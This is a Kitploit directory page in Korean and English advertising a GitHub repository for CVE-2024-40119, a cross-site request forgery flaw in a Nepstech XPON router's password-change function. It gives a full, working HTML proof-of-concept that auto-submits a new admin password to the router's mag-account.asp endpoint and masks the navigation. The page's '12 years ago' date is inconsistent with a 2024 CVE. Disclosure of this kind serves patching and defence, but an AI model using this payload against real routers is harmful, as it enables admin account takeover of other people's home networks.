Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
nepstech-xpon-router-CVE-2024-40119 — Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover. 비밀번호 변경 기능의 교차 사이트 요청 위조(CSRF) 취약점으로, 원격 공격자가 사용자의 동의 없이 관리자 비밀번호를 변경할 수 있어 잠재적인 계정 탈취로 이어질 수 있습니다. | Kitploit
도구/GitHubGitHub/baroi-ai/nepstech-xpon-router-cve-2024-40119
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubbaroi-ai/nepstech-xpon-router-cve-2024-40119

nepstech-xpon-router-CVE-2024-40119

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →

소개

Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover. 비밀번호 변경 기능의 교차 사이트 요청 위조(CSRF) 취약점으로, 원격 공격자가 사용자의 동의 없이 관리자 비밀번호를 변경할 수 있어 잠재적인 계정 탈취로 이어질 수 있습니다.

12년 전아직 검토되지 않음
공유

nepstech-xpon-router-CVE-2024-40119

작성자:

Subhodeep Baroi

CVE-2024-40119: Nepstech Wifi Router NTPL-XPON1GFEVN v1.0의 CSRF 취약점

설명

CVE-2024-40119은(는) Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 펌웨어 v2.0.1의 CSRF(교차 사이트 요청 위조) 취약점입니다. 이 취약점을 통해 원격 공격자는 사용자의 동의 없이 관리자 비밀번호를 변경하여 잠재적인 계정 탈취로 이어질 수 있습니다.

세부 정보

  • 취약점 유형: 교차 사이트 요청 위조 (CSRF)
  • 제품 공급업체: Nepstech
  • 영향받는 제품 코드 베이스: Wifi Router xpon (terminal) - 모델: NTPL-XPON1GFEVN - 버전: 1.0 및 펌웨어: V2.0.1
  • 영향받는 구성 요소: 라우터 웹 앱 비밀번호 변경 기능
  • 공격 유형: 원격
  • 영향: 관리자 계정 탈취

공격 벡터

원격 공격자는 인증된 사용자가 방문할 때 비밀번호 변경 기능을 트리거하는 악성 HTML 페이지를 만들 수 있습니다. 아래는 샘플 공격 벡터입니다:

root@kitploit:~
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
도구 다운로드